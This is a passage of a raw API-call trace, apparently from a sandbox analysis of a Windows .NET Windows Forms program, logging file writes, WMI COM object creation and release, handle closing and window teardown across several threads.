lpNumberOfBytesWritten=0x39e768*=0x298bd59, lpOverlapped=0x0) returned 1 [0071.689] WriteFile (in: hFile=0x418, lpBuffer=0xc6f1018*, nNumberOfBytesToWrite=0x29f8dc5, lpNumberOfBytesWritten=0x39e768, lpOverlapped=0x0 | out: lpBuffer=0xc6f1018*, lpNumberOfBytesWritten=0x39e768*=0x29f8dc5, lpOverlapped=0x0) returned 1 [0073.106] CloseHandle (hObject=0x418) returned 1 [0073.441] CoGetContextToken (in: pToken=0x39e648 | out: pToken=0x39e648) returned 0x0 [0073.441] IUnknown:QueryInterface (in: This=0x78c380, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e66c | out: ppvObject=0x39e66c*=0x78c38c) returned 0x0 [0073.442] IComThreadingInfo:GetCurrentThreadType (in: This=0x78c38c, pThreadType=0x39e6cc | out: pThreadType=0x39e6cc*=1) returned 0x0 [0073.442] IUnknown:Release (This=0x78c38c) returned 0x2 [0073.444] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x75d130*=0xa8, lpdwindex=0x39e4ec | out: lpdwindex=0x39e4ec) returned 0x0 [0073.445] CoGetContextToken (in: pToken=0x39daec | out: pToken=0x39daec) returned 0x0 [0073.445] CoGetContextToken (in: pToken=0x39dad4 | out: pToken=0x39dad4) returned 0x0 [0073.445] CoGetContextToken (in: pToken=0x39da60 | out: pToken=0x39da60) returned 0x0 [0073.445] WbemLocator:IUnknown:Release (This=0x7e6214) returned 0x1 [0073.445] WbemLocator:IUnknown:Release (This=0x880ca1c) returned 0x0 [0073.446] CoGetContextToken (in: pToken=0x39da60 | out: pToken=0x39da60) returned 0x0 [0073.446] IUnknown:Release (This=0x880d4d8) returned 0x2 [0073.446] IUnknown:Release (This=0x880d4d8) returned 0x1 [0073.446] CoGetContextToken (in: pToken=0x39da60 | out: pToken=0x39da60) returned 0x0 [0073.446] IUnknown:Release (This=0x8810218) returned 0x2 [0073.446] IUnknown:Release (This=0x8810218) returned 0x1 [0073.458] CoGetContextToken (in: pToken=0x39da5c | out: pToken=0x39da5c) returned 0x0 [0073.458] CoGetContextToken (in: pToken=0x39da1c | out: pToken=0x39da1c) returned 0x0 [0073.458] WbemLocator:IUnknown:Release (This=0x7f355c) returned 0x1 [0073.458] IUnknown:Release (This=0x88101dc) returned 0x0 [0073.466] CoGetContextToken (in: pToken=0x39daec | out: pToken=0x39daec) returned 0x0 [0073.466] CoGetContextToken (in: pToken=0x39daac | out: pToken=0x39daac) returned 0x0 [0073.466] WbemLocator:IUnknown:Release (This=0x7f2b0c) returned 0x1 [0073.466] IUnknown:Release (This=0x880d49c) returned 0x0 [0073.467] CoGetContextToken (in: pToken=0x39daec | out: pToken=0x39daec) returned 0x0 [0073.467] CoGetContextToken (in: pToken=0x39daac | out: pToken=0x39daac) returned 0x0 [0073.468] WbemLocator:IUnknown:Release (This=0x7ec4c4) returned 0x1 [0073.468] IUnknown:Release (This=0x880d3d4) returned 0x0 Thread: id = 2 os_tid = 0x928 Thread: id = 3 os_tid = 0x938 [0029.992] CoGetContextToken (in: pToken=0xd5f88c | out: pToken=0xd5f88c) returned 0x800401f0 [0029.992] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0070.360] CoGetContextToken (in: pToken=0xd5f880 | out: pToken=0xd5f880) returned 0x0 [0070.360] CoGetContextToken (in: pToken=0xd5f808 | out: pToken=0xd5f808) returned 0x0 [0070.360] WbemLocator:IUnknown:Release (This=0x8800b30) returned 0x1 [0070.360] WbemLocator:IUnknown:Release (This=0x8800b30) returned 0x0 [0070.360] CoGetContextToken (in: pToken=0xd5f880 | out: pToken=0xd5f880) returned 0x0 [0070.360] CoGetContextToken (in: pToken=0xd5f808 | out: pToken=0xd5f808) returned 0x0 [0070.360] WbemDefPath:IUnknown:Release (This=0x8800820) returned 0x1 [0070.360] WbemDefPath:IUnknown:Release (This=0x8800820) returned 0x0 [0070.361] CoGetContextToken (in: pToken=0xd5f880 | out: pToken=0xd5f880) returned 0x0 [0070.361] IUnknown:QueryInterface (in: This=0x78c380, riid=0x74aa3c98*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd5f828 | out: ppvObject=0xd5f828*=0x78c390) returned 0x0 [0070.361] CObjectContext::ContextCallback () returned 0x0 [0073.447] IUnknown:Release (This=0x78c390) returned 0x1 [0073.455] CloseHandle (hObject=0x364) returned 1 [0073.456] IUnknown:Release (This=0x8810218) returned 0x0 [0073.457] CoGetContextToken (in: pToken=0xd5f690 | out: pToken=0xd5f690) returned 0x0 [0073.458] IUnknown:QueryInterface (in: This=0x78c380, riid=0x74aa3c98*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd5f638 | out: ppvObject=0xd5f638*=0x78c390) returned 0x0 [0073.458] CObjectContext::ContextCallback () returned 0x0 [0073.465] IUnknown:Release (This=0x78c390) returned 0x1 [0073.465] IUnknown:Release (This=0x880d4d8) returned 0x0 [0073.465] CoGetContextToken (in: pToken=0xd5f690 | out: pToken=0xd5f690) returned 0x0 [0073.465] IUnknown:QueryInterface (in: This=0x78c380, riid=0x74aa3c98*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd5f638 | out: ppvObject=0xd5f638*=0x78c390) returned 0x0 [0073.466] CObjectContext::ContextCallback () returned 0x0 [0073.467] IUnknown:Release (This=0x78c390) returned 0x1 [0073.467] CoGetContextToken (in: pToken=0xd5f6a0 | out: pToken=0xd5f6a0) returned 0x0 [0073.467] IUnknown:QueryInterface (in: This=0x78c380, riid=0x74aa3c98*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd5f648 | out: ppvObject=0xd5f648*=0x78c390) returned 0x0 [0073.467] CObjectContext::ContextCallback () returned 0x0 [0073.469] IUnknown:Release (This=0x78c390) returned 0x1 [0073.469] IUnknown:Release (This=0x78c380) returned 0x0 [0073.471] CloseHandle (hObject=0x348) returned 1 [0073.471] CloseHandle (hObject=0x320) returned 1 [0073.472] RegCloseKey (hKey=0x350) returned 0x0 [0073.472] RegCloseKey (hKey=0x34c) returned 0x0 [0073.472] CloseHandle (hObject=0x1e4) returned 1 [0073.472] CloseHandle (hObject=0x458) returned 1 [0073.473] CloseHandle (hObject=0x344) returned 1 [0073.473] CloseHandle (hObject=0x2b4) returned 1 [0073.473] CloseHandle (hObject=0x368) returned 1 [0073.473] CloseHandle (hObject=0x250) returned 1 [0073.473] CloseHandle (hObject=0x240) returned 1 [0073.473] RegCloseKey (hKey=0x354) returned 0x0 [0073.474] SetWindowLongW (hWnd=0x6011a, nIndex=-4, dwNewLong=2009540061) returned 78973006 [0073.475] SetClassLongW (hWnd=0x6011a, nIndex=-24, dwNewLong=2009540061) returned 0x4b50826 [0073.475] PostMessageW (hWnd=0x6011a, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0073.475] SetWindowLongW (hWnd=0x3015c, nIndex=-4, dwNewLong=2009540061) returned 78973326 [0073.476] SetClassLongW (hWnd=0x3015c, nIndex=-24, dwNewLong=2009540061) returned 0x4b50966 [0073.476] PostMessageW (hWnd=0x3015c, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0073.476] SetWindowLongW (hWnd=0x40162, nIndex=-4, dwNewLong=2009540061) returned 78973246 [0073.476] SetClassLongW (hWnd=0x40162, nIndex=-24, dwNewLong=2009540061) returned 0x77c725dd [0073.476] PostMessageW (hWnd=0x40162, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0073.476] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0073.476] UnregisterClassW (lpClassName="WindowsForms10.Window.0.app.0.141b42a_r14_ad1", hInstance=0xe90000) returned 0 [0073.477] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0073.477] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", hInstance=0xe90000) returned 0 [0073.477] EtwEventUnregister () returned 0x0 [0073.482] IsWindow (hWnd=0x60106) returned 1 [0073.484] GetModuleHandleW (lpModuleName="user32.dll") returned 0x77130000 [0073.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0xd5f62c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW|r·?¶\x82\x94 t¨øÕ", lpUsedDefaultChar=0x0) returned 14 [0073.484] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0073.484] SetWindowLongW (hWnd=0x60106, nIndex=-4, dwNewLong=2009540061) returned 78973166 [0073.485] SetClassLongW (hWnd=0x60106, nIndex=-24, dwNewLong=2009540061) returned 0x4b508ee [0073.485] IsWindow (hWnd=0x60106) returned 1 [0073.485] DestroyWindow (hWnd=0x60106) returned 0 [0073.485] PostMessageW (hWnd=0x60106, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0073.485] SetConsoleCtrlHandler (HandlerRoutine=0x4b508c6, Add=0) returned 1 [0073.485] DeleteObject (ho=0x330801b3) returned 1 [0073.488] DestroyCursor (hCursor=0x90167) returned 1 [0073.489] GdipDeleteFont (font=0x6fe2940) returned 0x0 [0073.489] DeleteObject (ho=0x90a09c1) returned 1 [0073.490] DestroyCursor (hCursor=0x90185) returned 1 [0073.491] CloseHandle (hObject=0x210) returned 1 [0073.498] RegCloseKey (hKey=0x80000004) returned 0x0 [0073.498] UnmapViewOfFile (lpBaseAddress=0x410000) returned 1 [0073.499] CloseHandle (hObject=0x360) returned 1 [0073.501] CoGetContextToken (in: pToken=0xd5f4c8 | out: pToken=0xd5f4c8) returned 0x0 [0073.501] CoGetContextToken (in: pToken=0xd5f450 | out: pToken=0xd5f450) returned 0x0 [0073.501] WbemDefPath:IUnknown:Release (This=0x880ca30) returned 0x1 [0073.502] WbemDefPath:IUnknown:Release (This=0x880ca30) returned 0x0 [0073.502] CoGetContextToken (in: pToken=0xd5f450 | out: pToken=0xd5f450) returned 0x0 [0073.502] WbemDefPath:IUnknown:Release (This=0x8800998) returned 0x1 [0073.502] WbemDefPath:IUnknown:Release (This=0x8800998) returned 0x0 [0073.502] CoGetContextToken (in: pToken=0xd5f4c8 | out: pToken=0xd5f4c8) returned 0x0 [0073.502] CoGetContextToken (in: pToken=0xd5f450 | out: pToken=0xd5f450) returned 0x0 [0073.502] WbemLocator:IUnknown:Release (This=0x7eb09c) returned 0x1 [0073.502] WbemLocator:IUnknown:Release (This=0x880d334) returned 0x0 [0073.503] CoReleaseMarshalData (pStm=0x7c39d8) returned 0x0 [0073.508] IUnknown:Release (This=0x78c4f0) returned 0x0 [0073.508] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 4 os_tid = 0x948 Thread: id = 5 os_tid = 0x958 [0058.497] CoGetContextToken (in: pToken=0x4cdfadc | out: pToken=0x4cdfadc) returned 0x0 [0058.497] IUnknown:QueryInterface (in: This=0x78c4f0, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4cdfb00 | out: ppvObject=0x4cdfb00*=0x78c4fc) returned 0x0 [0058.497] IComThreadingInfo:GetCurrentThreadType (in: This=0x78c4fc, pThreadType=0x4cdfb2c | out: pThreadType=0x4cdfb2c*=0) returned 0x0 [0058.497] IUnknown:Release (This=0x78c4fc) returned 0x1 Thread: id = 6 os_tid = 0x968 Thread: id = 7 os_tid = 0x6f4 Thread: id = 8 os_tid = 0x180 [0036.459] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0036.589] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x899f464 | out: lpiid=0x899f464) returned 0x0 [0036.590] CoGetClassObject (in: rclsid=0x7bb874*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x899f178 | out: ppv=0x899f178*=0x8800810) returned 0x0 [0037.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800810, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x899f390 | out: ppvObject=0x899f390*=0x0) returned 0x80004002 [0037.268] WbemDefPath:IClassFactory:CreateInstance (in: This=0x8800810, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899f3a4 | out: ppvObject=0x899f3a4*=0x8800820) returned 0x0 [0037.269] WbemDefPath:IUnknown:Release (This=0x8800810) returned 0x0 [0037.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800820, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899efc4 | out: ppvObject=0x899efc4*=0x8800820) returned 0x0 [0037.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800820, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x899ef80 | out: ppvObject=0x899ef80*=0x0) returned 0x80004002 [0037.271] WbemDefPath:IUnknown:AddRef (This=0x8800820) returned 0x3 [0037.271] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800820, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x899e8dc | out: ppvObject=0x899e8dc*=0x0) returned 0x80004002 [0037.271] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800820, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x899e88c | out: ppvObject=0x899e88c*=0x0) returned 0x80004002 [0037.271] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800820, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899e898 | out: ppvObject=0x899e898*=0x7c0e38) returned 0x0 [0037.271] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7c0e38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x899e8a0 | out: pCid=0x899e8a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0037.271] WbemDefPath:IUnknown:Release (This=0x7c0e38) returned 0x3 [0037.271] CoGetContextToken (in: pToken=0x899e8f8 | out: pToken=0x899e8f8) returned 0x0 [0037.271] CoGetContextToken (in: pToken=0x899ed00 | out: pToken=0x899ed00) returned 0x0 [0037.271] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800820, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899ed90 | out: ppvObject=0x899ed90*=0x0) returned 0x80004002 [0037.272] WbemDefPath:IUnknown:Release (This=0x8800820) returned 0x2 [0037.272] WbemDefPath:IUnknown:Release (This=0x8800820) returned 0x1 [0037.273] SetEvent (hEvent=0x250) returned 1 [0037.281] CoGetClassObject (in: rclsid=0x7bb874*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x899f178 | out: ppv=0x899f178*=0x88008f0) returned 0x0 [0037.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x88008f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x899f390 | out: ppvObject=0x899f390*=0x0) returned 0x80004002 [0037.281] WbemDefPath:IClassFactory:CreateInstance (in: This=0x88008f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899f3a4 | out: ppvObject=0x899f3a4*=0x8800998) returned 0x0 [0037.281] WbemDefPath:IUnknown:Release (This=0x88008f0) returned 0x0 [0037.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800998, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899efc4 | out: ppvObject=0x899efc4*=0x8800998) returned 0x0 [0037.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800998, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x899ef80 | out: ppvObject=0x899ef80*=0x0) returned 0x80004002 [0037.281] WbemDefPath:IUnknown:AddRef (This=0x8800998) returned 0x3 [0037.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800998, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x899e8dc | out: ppvObject=0x899e8dc*=0x0) returned 0x80004002 [0037.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800998, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x899e88c | out: ppvObject=0x899e88c*=0x0) returned 0x80004002 [0037.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800998, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899e898 | out: ppvObject=0x899e898*=0x7c0e68) returned 0x0 [0037.281] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7c0e68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x899e8a0 | out: pCid=0x899e8a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0037.281] WbemDefPath:IUnknown:Release (This=0x7c0e68) returned 0x3 [0037.281] CoGetContextToken (in: pToken=0x899e8f8 | out: pToken=0x899e8f8) returned 0x0 [0037.281] CoGetContextToken (in: pToken=0x899ed00 | out: pToken=0x899ed00) returned 0x0 [0037.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800998, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899ed90 | out: ppvObject=0x899ed90*=0x0) returned 0x80004002 [0037.281] WbemDefPath:IUnknown:Release (This=0x8800998) returned 0x2 [0037.281] WbemDefPath:IUnknown:Release (This=0x8800998) returned 0x1 [0037.281] SetEvent (hEvent=0x2b4) returned 1 [0042.193] CoGetClassObject (in: rclsid=0x7bb874*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x899f178 | out: ppv=0x899f178*=0x8800b40) returned 0x0 [0042.193] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800b40, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x899f390 | out: ppvObject=0x899f390*=0x0) returned 0x80004002 [0042.193] WbemDefPath:IClassFactory:CreateInstance (in: This=0x8800b40, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899f3a4 | out: ppvObject=0x899f3a4*=0x880ca30) returned 0x0 [0042.193] WbemDefPath:IUnknown:Release (This=0x8800b40) returned 0x0 [0042.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x880ca30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899efc4 | out: ppvObject=0x899efc4*=0x880ca30) returned 0x0 [0042.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x880ca30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x899ef80 | out: ppvObject=0x899ef80*=0x0) returned 0x80004002 [0042.194] WbemDefPath:IUnknown:AddRef (This=0x880ca30) returned 0x3 [0042.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x880ca30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x899e8dc | out: ppvObject=0x899e8dc*=0x0) returned 0x80004002 [0042.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x880ca30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x899e88c | out: ppvObject=0x899e88c*=0x0) returned 0x80004002 [0042.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x880ca30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899e898 | out: ppvObject=0x899e898*=0x7c0fd8) returned 0x0 [0042.194] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7c0fd8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x899e8a0 | out: pCid=0x899e8a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0042.194] WbemDefPath:IUnknown:Release (This=0x7c0fd8) returned 0x3 [0042.194] CoGetContextToken (in: pToken=0x899e8f8 | out: pToken=0x899e8f8) returned 0x0 [0042.194] CoGetContextToken (in: pToken=0x899ed00 | out: pToken=0x899ed00) returned 0x0 [0042.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x880ca30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x899ed90 | out: ppvObject=0x899ed90*=0x0) returned 0x80004002 [0042.194] WbemDefPath:IUnknown:Release (This=0x880ca30) returned 0x2 [0042.194] WbemDefPath:IUnknown:Release (This=0x880ca30) returned 0x1 [0042.194] SetEvent (hEvent=0x320) returned 1 Thread: id = 9 os_tid = 0x53c Thread: id = 10 os_tid = 0x604 Thread: id = 11 os_tid = 0x2c4 Thread: id = 12 os_tid = 0x244 [0037.286] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0037.287] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x8f1f35c | out: lpiid=0x8f1f35c) returned 0x0 [0037.288] CoGetClassObject (in: rclsid=0x7bb8d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f1f070 | out: ppv=0x8f1f070*=0x8800928) returned 0x0 [0037.369] WbemLocator:IUnknown:QueryInterface (in: This=0x8800928, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f1f288 | out: ppvObject=0x8f1f288*=0x0) returned 0x80004002 [0037.369] WbemLocator:IClassFactory:CreateInstance (in: This=0x8800928, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1f29c | out: ppvObject=0x8f1f29c*=0x8800b30) returned 0x0 [0037.370] WbemLocator:IUnknown:Release (This=0x8800928) returned 0x0 [0037.370] WbemLocator:IUnknown:QueryInterface (in: This=0x8800b30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 